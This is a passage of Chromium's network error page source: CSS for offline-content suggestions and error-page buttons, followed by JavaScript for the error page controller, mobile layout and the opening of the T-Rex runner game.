  content: url(data:image/svg+xml;base64,PHN2ZyB4bWxucz0iaHR0cDovL3d3dy53My5vcmcvMjAwMC9zdmciIHdpZHRoPSIyNCIgaGVpZ2h0PSIyNCIgdmlld0JveD0iMCAwIDI0IDI0Ij48cGF0aCBkPSJNMTcgMTAuNVY3YTEgMSAwIDAgMC0xLTFINGExIDEgMCAwIDAtMSAxdjEwYTEgMSAwIDAgMCAxIDFoMTJhMSAxIDAgMCAwIDEtMXYtMy41bDQgNHYtMTFsLTQgNHoiIGZpbGw9IiMzQzQwNDMiLz48L3N2Zz4=);
}

.image-music-note {
  content: url(data:image/svg+xml;base64,PHN2ZyB4bWxucz0iaHR0cDovL3d3dy53My5vcmcvMjAwMC9zdmciIHdpZHRoPSIyNCIgaGVpZ2h0PSIyNCIgdmlld0JveD0iMCAwIDI0IDI0Ij48cGF0aCBkPSJNMTIgM3Y5LjI2Yy0uNS0uMTctMS0uMjYtMS41LS4yNkM4IDEyIDYgMTQgNiAxNi41UzggMjEgMTAuNSAyMXM0LjUtMiA0LjUtNC41VjZoNFYzaC03eiIgZmlsbD0iIzNDNDA0MyIvPjwvc3ZnPg==);
}

.image-earth {
  content: url(data:image/svg+xml;base64,PHN2ZyB3aWR0aD0iMjQiIGhlaWdodD0iMjQiIHZpZXdCb3g9IjAgMCAyNCAyNCIgeG1sbnM9Imh0dHA6Ly93d3cudzMub3JnLzIwMDAvc3ZnIj48cGF0aCBkPSJNMTIgMmM1LjUyIDAgMTAgNC40OCAxMCAxMHMtNC40OCAxMC0xMCAxMFMyIDE3LjUyIDIgMTIgNi40OCAyIDEyIDJ6TTQgMTJoNC40YzMuNDA3LjAyMiA0LjkyMiAxLjczIDQuNTQzIDUuMTI3SDkuNDg4djIuNDdhOC4wMDQgOC4wMDQgMCAwIDAgMTAuNDk4LTguMDgzQzE5LjMyNyAxMi41MDQgMTguMzMyIDEzIDE3IDEzYy0yLjEzNyAwLTMuMjA2LS45MTYtMy4yMDYtMi43NWgtMy43NDhjLS4yNzQtMi43MjguNjgzLTQuMDkyIDIuODctNC4wOTIgMC0uOTc1LjMyNy0xLjU5Ny44MTEtMS45N0E4LjAwNCA4LjAwNCAwIDAgMCA0IDEyeiIgZmlsbD0iIzNDNDA0MyIvPjwvc3ZnPg==);
}

.image-file {
  content: url(data:image/svg+xml;base64,PHN2ZyB4bWxucz0iaHR0cDovL3d3dy53My5vcmcvMjAwMC9zdmciIHdpZHRoPSIyNCIgaGVpZ2h0PSIyNCIgdmlld0JveD0iMCAwIDI0IDI0Ij48cGF0aCBkPSJNMTMgOVYzLjVMMTguNSA5TTYgMmMtMS4xMSAwLTIgLjg5LTIgMnYxNmEyIDIgMCAwIDAgMiAyaDEyYTIgMiAwIDAgMCAyLTJWOGwtNi02SDZ6IiBmaWxsPSIjM0M0MDQzIi8+PC9zdmc+);
}

.offline-content-suggestion-texts {
  display: flex;
  flex-direction: column;
  justify-content: space-between;
  line-height: 1.3;
  padding: .9em;
  width: 100%;
}

.offline-content-suggestion-title {
  -webkit-box-orient: vertical;
  -webkit-line-clamp: 3;
  color: rgb(32, 33, 36);
  display: -webkit-box;
  font-size: 1.1em;
  overflow: hidden;
  text-overflow: ellipsis;
}

div.offline-content-suggestion {
  align-items: stretch;
  border: 1px solid rgb(218, 220, 224);
  border-radius: 8px;
  display: flex;
  justify-content: space-between;
  margin-bottom: .8em;
}

.suggestion-with-image {
  flex-direction: row;
  height: 8.2em;
  max-height: 8.2em;
}

.suggestion-with-icon {
  flex-direction: row-reverse;
  height: 4.2em;
  max-height: 4.2em;
}

.suggestion-with-icon .offline-content-suggestion-title {
  -webkit-line-clamp: 1;
  word-break: break-all;
}

.suggestion-with-icon .offline-content-suggestion-texts {
  padding-inline-start: 0;
}

.offline-content-suggestion-attribution-freshness {
  color: rgb(95, 99, 104);
  display: flex;
  font-size: .8em;
  line-height: 1.7em;
}

.offline-content-suggestion-attribution {
  -webkit-box-orient: vertical;
  -webkit-line-clamp: 1;
  display: -webkit-box;
  flex-shrink: 1;
  margin-inline-end: 0.3em;
  overflow: hidden;
  overflow-wrap: break-word;
  text-overflow: ellipsis;
  word-break: break-all;
}

.no-attribution .offline-content-suggestion-attribution {
  display: none;
}

.offline-content-suggestion-freshness::before {
  content: '-';
  display: inline-block;
  flex-shrink: 0;
  margin-inline-end: .1em;
  margin-inline-start: .1em;
}

.no-attribution .offline-content-suggestion-freshness::before {
  display: none;
}

.offline-content-suggestion-freshness {
  flex-shrink: 0;
}

.suggestion-with-image .offline-content-suggestion-pin-spacer {
  flex-grow: 100;
  flex-shrink: 1;
}

.suggestion-with-image .offline-content-suggestion-pin {
  content: url(data:image/svg+xml;base64,PHN2ZyB4bWxucz0iaHR0cDovL3d3dy53My5vcmcvMjAwMC9zdmciIHhtbG5zOnhsaW5rPSJodHRwOi8vd3d3LnczLm9yZy8xOTk5L3hsaW5rIiB2aWV3Qm94PSIwIDAgMjQgMjQiIHdpZHRoPSIyNCIgaGVpZ2h0PSIyNCI+PGRlZnM+PHBhdGggaWQ9ImEiIGQ9Ik0wIDBoMjR2MjRIMFYweiIvPjwvZGVmcz48Y2xpcFBhdGggaWQ9ImIiPjx1c2UgeGxpbms6aHJlZj0iI2EiIG92ZXJmbG93PSJ2aXNpYmxlIi8+PC9jbGlwUGF0aD48cGF0aCBjbGlwLXBhdGg9InVybCgjYikiIGQ9Ik0xMiAyQzYuNSAyIDIgNi41IDIgMTJzNC41IDEwIDEwIDEwIDEwLTQuNSAxMC0xMFMxNy41IDIgMTIgMnptNSAxNkg3di0yaDEwdjJ6bS02LjctNEw3IDEwLjdsMS40LTEuNCAxLjkgMS45IDUuMy01LjNMMTcgNy4zIDEwLjMgMTR6IiBmaWxsPSIjOUFBMEE2Ii8+PC9zdmc+);
  flex-shrink: 0;
  height: 1.4em;
  margin-inline-start: .4em;
  width: 1.4em;
}

/* Controls the animation (and a bit more) of the launch-downloads-home action
 * button when the offline content list is expanded/shown.
 */
#offline-content-list-action {
  text-align: center;
  transition: visibility 0s 200ms, opacity 200ms 200ms linear;
}

/* Controls the animation of the launch-downloads-home action button when the
 * offline content list is collapsed/hidden.
 */
#offline-content-list.list-hidden #offline-content-list-action {
  opacity: 0;
  transition: opacity 200ms linear, visibility 0s 200ms;
  visibility: hidden;
}

#cancel-save-page-button {
  background-image: url(data:image/svg+xml;base64,PHN2ZyB4bWxucz0iaHR0cDovL3d3dy53My5vcmcvMjAwMC9zdmciIHZpZXdCb3g9IjAgMCAyNCAyNCIgd2lkdGg9IjI0IiBoZWlnaHQ9IjI0Ij48Y2xpcFBhdGggaWQ9Im1hc2siPjxwYXRoIGQ9Ik0xMiAyQzYuNSAyIDIgNi41IDIgMTJzNC41IDEwIDEwIDEwIDEwLTQuNSAxMC0xMFMxNy41IDIgMTIgMnptNSAxNkg3di0yaDEwdjJ6bS02LjctNEw3IDEwLjdsMS40LTEuNCAxLjkgMS45IDUuMy01LjNMMTcgNy4zIDEwLjMgMTR6IiBmaWxsPSIjOUFBMEE2Ii8+PC9jbGlwUGF0aD48cGF0aCBjbGlwLXBhdGg9InVybCgjbWFzaykiIGZpbGw9IiM5QUEwQTYiIGQ9Ik0wIDBoMjR2MjRIMHoiLz48cGF0aCBjbGlwLXBhdGg9InVybCgjbWFzaykiIGZpbGw9IiMxQTczRTgiIHN0eWxlPSJhbmltYXRpb246b2ZmbGluZUFuaW1hdGlvbiA0cyBpbmZpbml0ZSIgZD0iTTAgMGgyNHYyNEgweiIvPjxzdHlsZT5Aa2V5ZnJhbWVzIG9mZmxpbmVBbmltYXRpb257MCUsMzUle2hlaWdodDowfTYwJXtoZWlnaHQ6MTAwJX05MCV7ZmlsbC1vcGFjaXR5OjF9dG97ZmlsbC1vcGFjaXR5OjB9fTwvc3R5bGU+PC9zdmc+);
  background-position: right 27px center;
  background-repeat: no-repeat;
  border: 1px solid var(--google-gray-300);
  border-radius: 5px;
  color: var(--google-gray-700);
  margin-bottom: 26px;
  padding-bottom: 16px;
  padding-inline-end: 88px;
  padding-inline-start: 16px;
  padding-top: 16px;
  text-align: start;
}

html[dir='rtl'] #cancel-save-page-button {
  background-position: left 27px center;
}

#save-page-for-later-button {
  display: flex;
  justify-content: start;
}

#save-page-for-later-button a::before {
  content: url(data:image/svg+xml;base64,PHN2ZyB4bWxucz0iaHR0cDovL3d3dy53My5vcmcvMjAwMC9zdmciIHdpZHRoPSIxLjJlbSIgaGVpZ2h0PSIxLjJlbSIgdmlld0JveD0iMCAwIDI0IDI0Ij48cGF0aCBkPSJNNSAyMGgxNHYtMkg1bTE0LTloLTRWM0g5djZINWw3IDcgNy03eiIgZmlsbD0iIzQyODVGNCIvPjwvc3ZnPg==);
  display: inline-block;
  margin-inline-end: 4px;
  vertical-align: -webkit-baseline-middle;
}

.hidden#save-page-for-later-button {
  display: none;
}

/* Don't allow overflow when in a subframe. */
html[subframe] body {
  overflow: hidden;
}

#sub-frame-error {
  -webkit-align-items: center;
  -webkit-flex-flow: column;
  -webkit-justify-content: center;
  background-color: #DDD;
  display: -webkit-flex;
  height: 100%;
  left: 0;
  position: absolute;
  text-align: center;
  top: 0;
  transition: background-color 200ms ease-in-out;
  width: 100%;
}

#sub-frame-error:hover {
  background-color: #EEE;
}

#sub-frame-error .icon-generic {
  margin: 0 0 16px;
}

#sub-frame-error-details {
  margin: 0 10px;
  text-align: center;
  visibility: hidden;
}

/* Show details only when hovering. */
#sub-frame-error:hover #sub-frame-error-details {
  visibility: visible;
}

/* If the iframe is too small, always hide the error code. */
/* TODO(mmenke): See if overflow: no-display works better, once supported. */
@media (max-width: 200px), (max-height: 95px) {
  #sub-frame-error-details {
    display: none;
  }
}

/* Adjust icon for small embedded frames in apps. */
@media (max-height: 100px) {
  #sub-frame-error .icon-generic {
    height: auto;
    margin: 0;
    padding-top: 0;
    width: 25px;
  }
}

/* details-button is special; it's a <button> element that looks like a link. */
#details-button {
  box-shadow: none;
  min-width: 0;
}

/* Styles for platform dependent separation of controls and details button. */
.suggested-left > #control-buttons,
.suggested-right > #details-button {
  float: left;
}

.suggested-right > #control-buttons,
.suggested-left > #details-button {
  float: right;
}

.suggested-left .secondary-button {
  margin-inline-end: 0;
  margin-inline-start: 16px;
}

#details-button.singular {
  float: none;
}

/* download-button shows both icon and text. */
#download-button {
  padding-bottom: 4px;
  padding-top: 4px;
  position: relative;
}

#download-button::before {
  background: -webkit-image-set(
      url(data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABgAAAAYCAQAAABKfvVzAAAAO0lEQVQ4y2NgGArgPxIY1YChsOE/LtBAmpYG0mxpIOSDBpKUo2lpIDZxNJCkHKqlYZAla3RAHQ1DFgAARRroHyLNTwwAAAAASUVORK5CYII=) 1x,
      url(data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAADAAAAAwCAQAAAD9CzEMAAAAZElEQVRYw+3Ruw3AMAwDUY3OzZUmRRD4E9iim9wNwAdbEURHyk4AAAAATiCVK8lLyPsKeT9K3lsownnunfkPxO78hKiYHxBV8x2icr5BVM+/CMf8g3DN34Rzns6ViwHUAUQ/6wIAd5Km7l6c8AAAAABJRU5ErkJggg==) 2x)
    no-repeat;
  content: '';
  display: inline-block;
  height: 24px;
  margin-inline-end: 4px;
  margin-inline-start: -4px;
  vertical-align: middle;
  width: 24px;
}

#download-button:disabled {
  background: rgb(180, 206, 249);
  color: rgb(255, 255, 255);
}

#buttons::after {
  clear: both;
  content: '';
  display: block;
  width: 100%;
}

/* Offline page */
html[dir='rtl'] .runner-container,
html[dir='rtl'].offline .icon-offline {
  transform: scaleX(-1);
}

.offline {
  transition: filter 1.5s cubic-bezier(0.65, 0.05, 0.36, 1),
              background-color 1.5s cubic-bezier(0.65, 0.05, 0.36, 1);

  will-change: filter, background-color;

}

.offline body {
  transition: background-color 1.5s cubic-bezier(0.65, 0.05, 0.36, 1);
}

.offline #main-message > p {
  display: none;
}

.offline.inverted {
  background-color: #fff;
  filter: invert(1);
}

.offline.inverted body {
  background-color: #fff;
}

.offline .interstitial-wrapper {
  color: var(--text-color);
  font-size: 1em;
  line-height: 1.55;
  margin: 0 auto;
  max-width: 600px;
  padding-top: 100px;
  position: relative;
  width: 100%;
}

.offline .runner-container {
  direction: ltr;
  height: 150px;
  max-width: 600px;
  overflow: hidden;
  position: absolute;
  top: 35px;
  width: 44px;
}

.offline .runner-container:focus {
  outline: none;
}

.offline .runner-container:focus-visible {
  outline: 3px solid var(--google-blue-300);
}

.offline .runner-canvas {
  height: 150px;
  max-width: 600px;
  opacity: 1;
  overflow: hidden;
  position: absolute;
  top: 0;
  z-index: 10;
}

.offline .controller {
  height: 100vh;
  left: 0;
  position: absolute;
  top: 0;
  width: 100vw;
  z-index: 9;
}

#offline-resources {
  display: none;
}

#offline-instruction {
  image-rendering: pixelated;
  left: 0;
  margin: auto;
  position: absolute;
  right: 0;
  top: 60px;
  width: fit-content;
}

.offline-runner-live-region {
  bottom: 0;
  clip-path: polygon(0 0, 0 0, 0 0);
  color: var(--background-color);
  display: block;
  font-size: xx-small;
  overflow: hidden;
  position: absolute;
  text-align: center;
  transition: color 1.5s cubic-bezier(0.65, 0.05, 0.36, 1);
  user-select: none;
}

/* Custom toggle */
.slow-speed-option {
  align-items: center;
  background: var(--google-gray-50);
  border-radius: 24px/50%;
  bottom: 0;
  color: var(--error-code-color);
  display: inline-flex;
  font-size: 1em;
  left: 0;
  line-height: 1.1em;
  margin: 5px auto;
  padding: 2px 12px 3px 20px;
  position: absolute;
  right: 0;
  width: max-content;
  z-index: 999;
}

.slow-speed-option.hidden {
  display: none;
}

.slow-speed-option [type=checkbox] {
  opacity: 0;
  pointer-events: none;
  position: absolute;
}

.slow-speed-option .slow-speed-toggle {
  cursor: pointer;
  margin-inline-start: 8px;
  padding: 8px 4px;
  position: relative;
}

.slow-speed-option [type=checkbox]:disabled ~ .slow-speed-toggle {
  cursor: default;
}

.slow-speed-option-label [type=checkbox] {
  opacity: 0;
  pointer-events: none;
  position: absolute;
}

.slow-speed-option .slow-speed-toggle::before,
.slow-speed-option .slow-speed-toggle::after {
  content: '';
  display: block;
  margin: 0 3px;
  transition: all 100ms cubic-bezier(0.4, 0, 1, 1);
}

.slow-speed-option .slow-speed-toggle::before {
  background: rgb(189,193,198);
  border-radius: 0.65em;
  height: 0.9em;
  width: 2em;
}

.slow-speed-option .slow-speed-toggle::after {
  background: #fff;
  border-radius: 50%;
  box-shadow: 0 1px 3px 0 rgb(0 0 0 / 40%);
  height: 1.2em;
  position: absolute;
  top: 51%;
  transform: translate(-20%, -50%);
  width: 1.1em;
}

.slow-speed-option [type=checkbox]:focus + .slow-speed-toggle {
  box-shadow: 0 0 8px rgb(94, 158, 214);
  outline: 1px solid rgb(93, 157, 213);
}

.slow-speed-option [type=checkbox]:checked + .slow-speed-toggle::before {
  background: var(--google-blue-600);
  opacity: 0.5;
}

.slow-speed-option [type=checkbox]:checked + .slow-speed-toggle::after {
  background: var(--google-blue-600);
  transform: translate(calc(2em - 90%), -50%);
}

.slow-speed-option [type=checkbox]:checked:disabled +
  .slow-speed-toggle::before {
  background: rgb(189,193,198);
}

.slow-speed-option [type=checkbox]:checked:disabled +
  .slow-speed-toggle::after {
  background: var(--google-gray-50);
}

@media (max-width: 420px) {
  #download-button {
    padding-bottom: 12px;
    padding-top: 12px;
  }

  .suggested-left > #control-buttons,
  .suggested-right > #control-buttons {
    float: none;
  }

  .snackbar {
    border-radius: 0;
    bottom: 0;
    left: 0;
    width: 100%;
  }
}

@media (max-height: 350px) {
  h1 {
    margin: 0 0 15px;
  }

  .icon-offline {
    margin: 0 0 10px;
  }

  .interstitial-wrapper {
    margin-top: 5%;
  }

  .nav-wrapper {
    margin-top: 30px;
  }
}

@media (min-width: 420px) and (max-width: 736px) and
       (min-height: 240px) and (max-height: 420px) and
       (orientation:landscape) {
  .interstitial-wrapper {
    margin-bottom: 100px;
  }
}

@media (max-width: 360px) and (max-height: 480px) {
  .offline .interstitial-wrapper {
    padding-top: 60px;
  }

  .offline .runner-container {
    top: 8px;
  }
}

@media (min-height: 240px) and (orientation: landscape) {
  .offline .interstitial-wrapper {
    margin-bottom: 90px;
  }

  .icon-offline {
    margin-bottom: 20px;
  }
}

@media (max-height: 320px) and (orientation: landscape) {
  .icon-offline {
    margin-bottom: 0;
  }

  .offline .runner-container {
    top: 10px;
  }
}

@media (max-width: 240px) {
  button {
    padding-inline-end: 12px;
    padding-inline-start: 12px;
  }

  .interstitial-wrapper {
    overflow: inherit;
    padding: 0 8px;
  }
}

@media (max-width: 120px) {
  button {
    width: auto;
  }
}

.arcade-mode,
.arcade-mode .runner-container,
.arcade-mode .runner-canvas {
  image-rendering: pixelated;
  max-width: 100%;
  overflow: hidden;
}

.arcade-mode #buttons,
.arcade-mode #main-content {
  opacity: 0;
  overflow: hidden;
}

.arcade-mode .interstitial-wrapper {
  height: 100vh;
  max-width: 100%;
  overflow: hidden;
}

.arcade-mode .runner-container {
  left: 0;
  margin: auto;
  right: 0;
  transform-origin: top center;
  transition: transform 250ms cubic-bezier(0.4, 0, 1, 1) 400ms;
  z-index: 2;
}

@media (prefers-color-scheme: dark) {
  .icon {
    filter: invert(1);
  }

  .offline .runner-canvas {
    filter: invert(1);
  }

  .offline.inverted {
    background-color: var(--background-color);
    filter: invert(0);
  }

  .offline.inverted body {
    background-color: #fff;
  }

  .offline.inverted .offline-runner-live-region {
    color: #fff;
  }

  #suggestions-list a {
    color: var(--link-color);
  }

  #error-information-button {
    filter: invert(0.6);
  }

  .slow-speed-option {
    background: var(--google-gray-800);
    color: var(--google-gray-100);
  }

  .slow-speed-option .slow-speed-toggle::before,
  .slow-speed-option [type=checkbox]:checked:disabled +
    .slow-speed-toggle::before {
     background: rgb(189,193,198);
  }

  .slow-speed-option [type=checkbox]:checked + .slow-speed-toggle::after,
  .slow-speed-option [type=checkbox]:checked + .slow-speed-toggle::before {
    background: var(--google-blue-300);
  }
}
</style>
  <script>// Copyright 2013 The Chromium Authors
// Use of this source code is governed by a BSD-style license that can be
// found in the LICENSE file.

/**
 * @typedef {{
 *   downloadButtonClick: function(),
 *   reloadButtonClick: function(string),
 *   detailsButtonClick: function(),
 *   diagnoseErrorsButtonClick: function(),
 *   trackEasterEgg: function(),
 *   updateEasterEggHighScore: function(number),
 *   resetEasterEggHighScore: function(),
 *   launchOfflineItem: function(string, string),
 *   savePageForLater: function(),
 *   cancelSavePage: function(),
 *   listVisibilityChange: function(boolean),
 * }}
 */
// eslint-disable-next-line no-var
var errorPageController;

const HIDDEN_CLASS = 'hidden';

// Decodes a UTF16 string that is encoded as base64.
function decodeUTF16Base64ToString(encoded_text) {
  const data = atob(encoded_text);
  let result = '';
  for (let i = 0; i < data.length; i += 2) {
    result +=
        String.fromCharCode(data.charCodeAt(i) * 256 + data.charCodeAt(i + 1));
  }
  return result;
}

function toggleHelpBox() {
  const helpBoxOuter = document.getElementById('details');
  helpBoxOuter.classList.toggle(HIDDEN_CLASS);
  const detailsButton = document.getElementById('details-button');
  if (helpBoxOuter.classList.contains(HIDDEN_CLASS)) {
    /** @suppress {missingProperties} */
    detailsButton.innerText = detailsButton.detailsText;
  } else {
    /** @suppress {missingProperties} */
    detailsButton.innerText = detailsButton.hideDetailsText;
  }

  // Details appears over the main content on small screens.
  if (mobileNav) {
    document.getElementById('main-content').classList.toggle(HIDDEN_CLASS);
    const runnerContainer = document.querySelector('.runner-container');
    if (runnerContainer) {
      runnerContainer.classList.toggle(HIDDEN_CLASS);
    }
  }
}

function diagnoseErrors() {
  if (window.errorPageController) {
    errorPageController.diagnoseErrorsButtonClick();
  }
}

// Subframes use a different layout but the same html file.  This is to make it
// easier to support platforms that load the error page via different
// mechanisms (Currently just iOS). We also use the subframe style for portals
// as they are embedded like subframes and can't be interacted with by the user.
let isSubFrame = false;
if (window.top.location !== window.location || window.portalHost) {
  document.documentElement.setAttribute('subframe', '');
  isSubFrame = true;
}

// Re-renders the error page using |strings| as the dictionary of values.
// Used by NetErrorTabHelper to update DNS error pages with probe results.
function updateForDnsProbe(strings) {
  const context = new JsEvalContext(strings);
  jstProcess(context, document.getElementById('t'));
  onDocumentLoadOrUpdate();
}

// Adds an icon class to the list and removes classes previously set.
function updateIconClass(newClass) {
  const frameSelector = isSubFrame ? '#sub-frame-error' : '#main-frame-error';
  const iconEl = document.querySelector(frameSelector + ' .icon');

  if (iconEl.classList.contains(newClass)) {
    return;
  }

  iconEl.className = 'icon ' + newClass;
}

// Implements button clicks.  This function is needed during the transition
// between implementing these in trunk chromium and implementing them in iOS.
function reloadButtonClick(url) {
  if (window.errorPageController) {
    // 

    // 
    errorPageController.reloadButtonClick();
    // 
  } else {
    window.location = url;
  }
}

function downloadButtonClick() {
  if (window.errorPageController) {
    errorPageController.downloadButtonClick();
    const downloadButton = document.getElementById('download-button');
    downloadButton.disabled = true;
    /** @suppress {missingProperties} */
    downloadButton.textContent = downloadButton.disabledText;

    document.getElementById('download-link-wrapper')
        .classList.add(HIDDEN_CLASS);
    document.getElementById('download-link-clicked-wrapper')
        .classList.remove(HIDDEN_CLASS);
  }
}

function detailsButtonClick() {
  if (window.errorPageController) {
    errorPageController.detailsButtonClick();
  }
}

let primaryControlOnLeft = true;
// clang-format off
// 
// clang-format on
primaryControlOnLeft = false;
// 

function setAutoFetchState(scheduled, can_schedule) {
  document.getElementById('cancel-save-page-button')
      .classList.toggle(HIDDEN_CLASS, !scheduled);
  document.getElementById('save-page-for-later-button')
      .classList.toggle(HIDDEN_CLASS, scheduled || !can_schedule);
}

function savePageLaterClick() {
  errorPageController.savePageForLater();
  // savePageForLater will eventually trigger a call to setAutoFetchState() when
  // it completes.
}

function cancelSavePageClick() {
  errorPageController.cancelSavePage();
  // setAutoFetchState is not called in response to cancelSavePage(), so do it
  // now.
  setAutoFetchState(false, true);
}

function toggleErrorInformationPopup() {
  document.getElementById('error-information-popup-container')
      .classList.toggle(HIDDEN_CLASS);
}

function launchOfflineItem(itemID, name_space) {
  errorPageController.launchOfflineItem(itemID, name_space);
}

function launchDownloadsPage() {
  errorPageController.launchDownloadsPage();
}

function getIconForSuggestedItem(item) {
  // Note: |item.content_type| contains the enum values from
  // chrome::mojom::AvailableContentType.
  switch (item.content_type) {
    case 1:  // kVideo
      return 'image-video';
    case 2:  // kAudio
      return 'image-music-note';
    case 0:  // kPrefetchedPage
    case 3:  // kOtherPage
      return 'image-earth';
  }
  return 'image-file';
}

function getSuggestedContentDiv(item, index) {
  // Note: See AvailableContentToValue in available_offline_content_helper.cc
  // for the data contained in an |item|.
  // TODO(carlosk): Present |snippet_base64| when that content becomes
  // available.
  let thumbnail = '';
  const extraContainerClasses = [];
  // html_inline.py will try to replace src attributes with data URIs using a
  // simple regex. The following is obfuscated slightly to avoid that.
  const source = 'src';
  if (item.thumbnail_data_uri) {
    extraContainerClasses.push('suggestion-with-image');
    thumbnail = `<img ${source}="${item.thumbnail_data_uri}">`;
  } else {
    extraContainerClasses.push('suggestion-with-icon');
    const iconClass = getIconForSuggestedItem(item);
    thumbnail = `<div><img class="${iconClass}"></div>`;
  }

  let favicon = '';
  if (item.favicon_data_uri) {
    favicon = `<img ${source}="${item.favicon_data_uri}">`;
  } else {
    extraContainerClasses.push('no-favicon');
  }

  if (!item.attribution_base64) {
    extraContainerClasses.push('no-attribution');
  }

  return `
  <div class="offline-content-suggestion ${extraContainerClasses.join(' ')}"
    onclick="launchOfflineItem('${item.ID}', '${item.name_space}')">
      <div class="offline-content-suggestion-texts">
        <div id="offline-content-suggestion-title-${index}"
             class="offline-content-suggestion-title">
        </div>
        <div class="offline-content-suggestion-attribution-freshness">
          <div id="offline-content-suggestion-favicon-${index}"
               class="offline-content-suggestion-favicon">
            ${favicon}
          </div>
          <div id="offline-content-suggestion-attribution-${index}"
               class="offline-content-suggestion-attribution">
          </div>
          <div class="offline-content-suggestion-freshness">
            ${item.date_modified}
          </div>
          <div class="offline-content-suggestion-pin-spacer"></div>
          <div class="offline-content-suggestion-pin"></div>
        </div>
      </div>
      <div class="offline-content-suggestion-thumbnail">
        ${thumbnail}
      </div>
  </div>`;
}

/**
 * @typedef {{
 *   ID: string,
 *   name_space: string,
 *   title_base64: string,
 *   snippet_base64: string,
 *   date_modified: string,
 *   attribution_base64: string,
 *   thumbnail_data_uri: string,
 *   favicon_data_uri: string,
 *   content_type: number,
 * }}
 */
let AvailableOfflineContent;

// Populates a list of suggested offline content.
// Note: For security reasons all content downloaded from the web is considered
// unsafe and must be securely handled to be presented on the dino page. Images
// have already been safely re-encoded but textual content -- like title and
// attribution -- must be properly handled here.
// @param {boolean} isShown
// @param {Array<AvailableOfflineContent>} suggestions
function offlineContentAvailable(isShown, suggestions) {
  if (!suggestions || !loadTimeData.valueExists('offlineContentList')) {
    return;
  }

  const suggestionsHTML = [];
  for (let index = 0; index < suggestions.length; index++) {
    suggestionsHTML.push(getSuggestedContentDiv(suggestions[index], index));
  }

  document.getElementById('offline-content-suggestions').innerHTML =
      suggestionsHTML.join('\n');

  // Sets textual web content using |textContent| to make sure it's handled as
  // plain text.
  for (let index = 0; index < suggestions.length; index++) {
    document.getElementById(`offline-content-suggestion-title-${index}`)
        .textContent =
        decodeUTF16Base64ToString(suggestions[index].title_base64);
    document.getElementById(`offline-content-suggestion-attribution-${index}`)
        .textContent =
        decodeUTF16Base64ToString(suggestions[index].attribution_base64);
  }

  const contentListElement = document.getElementById('offline-content-list');
  if (document.dir === 'rtl') {
    contentListElement.classList.add('is-rtl');
  }
  contentListElement.hidden = false;
  // The list is configured as hidden by default. Show it if needed.
  if (isShown) {
    toggleOfflineContentListVisibility(false);
  }
}

function toggleOfflineContentListVisibility(updatePref) {
  if (!loadTimeData.valueExists('offlineContentList')) {
    return;
  }

  const contentListElement = document.getElementById('offline-content-list');
  const isVisible = !contentListElement.classList.toggle('list-hidden');

  if (updatePref && window.errorPageController) {
    errorPageController.listVisibilityChanged(isVisible);
  }
}

// Called on document load, and from updateForDnsProbe().
function onDocumentLoadOrUpdate() {
  const downloadButtonVisible = loadTimeData.valueExists('downloadButton') &&
      loadTimeData.getValue('downloadButton').msg;
  const detailsButton = document.getElementById('details-button');

  // If offline content suggestions will be visible, the usual buttons will not
  // be presented.
  const offlineContentVisible =
      loadTimeData.valueExists('suggestedOfflineContentPresentation');
  if (offlineContentVisible) {
    document.querySelector('.nav-wrapper').classList.add(HIDDEN_CLASS);
    detailsButton.classList.add(HIDDEN_CLASS);

    document.getElementById('download-link').hidden = !downloadButtonVisible;
    document.getElementById('download-links-wrapper')
        .classList.remove(HIDDEN_CLASS);
    document.getElementById('error-information-popup-container')
        .classList.add('use-popup-container', HIDDEN_CLASS);
    document.getElementById('error-information-button')
        .classList.remove(HIDDEN_CLASS);
  }

  const attemptAutoFetch = loadTimeData.valueExists('attemptAutoFetch') &&
      loadTimeData.getValue('attemptAutoFetch');

  const reloadButtonVisible = loadTimeData.valueExists('reloadButton') &&
      loadTimeData.getValue('reloadButton').msg;

  const reloadButton = document.getElementById('reload-button');
  const downloadButton = document.getElementById('download-button');
  if (reloadButton.style.display === 'none' &&
      downloadButton.style.display === 'none') {
    detailsButton.classList.add('singular');
  }

  // Show or hide control buttons.
  const controlButtonDiv = document.getElementById('control-buttons');
  controlButtonDiv.hidden =
      offlineContentVisible || !(reloadButtonVisible || downloadButtonVisible);

  const iconClass = loadTimeData.valueExists('iconClass') &&
      loadTimeData.getValue('iconClass');

  updateIconClass(iconClass);

  if (!isSubFrame && iconClass === 'icon-offline') {
    document.documentElement.classList.add('offline');
    new Runner('.interstitial-wrapper');
  }
}

function onDocumentLoad() {
  // Sets up the proper button layout for the current platform.
  const buttonsDiv = document.getElementById('buttons');
  if (primaryControlOnLeft) {
    buttonsDiv.classList.add('suggested-left');
  } else {
    buttonsDiv.classList.add('suggested-right');
  }

  onDocumentLoadOrUpdate();
}

document.addEventListener('DOMContentLoaded', onDocumentLoad);
</script>
  <script>// Copyright 2015 The Chromium Authors
// Use of this source code is governed by a BSD-style license that can be
// found in the LICENSE file.

let mobileNav = false;

/**
 * For small screen mobile the navigation buttons are moved
 * below the advanced text.
 */
function onResize() {
  const helpOuterBox = document.querySelector('#details');
  const mainContent = document.querySelector('#main-content');
  const mediaQuery = '(min-width: 240px) and (max-width: 420px) and ' +
      '(min-height: 401px), ' +
      '(max-height: 560px) and (min-height: 240px) and ' +
      '(min-width: 421px)';

  const detailsHidden = helpOuterBox.classList.contains(HIDDEN_CLASS);
  const runnerContainer = document.querySelector('.runner-container');

  // Check for change in nav status.
  if (mobileNav !== window.matchMedia(mediaQuery).matches) {
    mobileNav = !mobileNav;

    // Handle showing the top content / details sections according to state.
    if (mobileNav) {
      mainContent.classList.toggle(HIDDEN_CLASS, !detailsHidden);
      helpOuterBox.classList.toggle(HIDDEN_CLASS, detailsHidden);
      if (runnerContainer) {
        runnerContainer.classList.toggle(HIDDEN_CLASS, !detailsHidden);
      }
    } else if (!detailsHidden) {
      // Non mobile nav with visible details.
      mainContent.classList.remove(HIDDEN_CLASS);
      helpOuterBox.classList.remove(HIDDEN_CLASS);
      if (runnerContainer) {
        runnerContainer.classList.remove(HIDDEN_CLASS);
      }
    }
  }
}

function setupMobileNav() {
  window.addEventListener('resize', onResize);
  onResize();
}

document.addEventListener('DOMContentLoaded', setupMobileNav);
</script>
  <script>// Copyright 2014 The Chromium Authors
// Use of this source code is governed by a BSD-style license that can be
// found in the LICENSE file.

/**
 * T-Rex runner.
 * @param {string} outerContainerId Outer containing element id.
 * @param {!Object=} opt_config
 * @constructor
 * @implements {EventListener}
 * @export
 */
function Runner(outerContainerId, opt_config) {
  // Singleton
  if (Runner.instance_) {
    return Runner.instance_;
  }
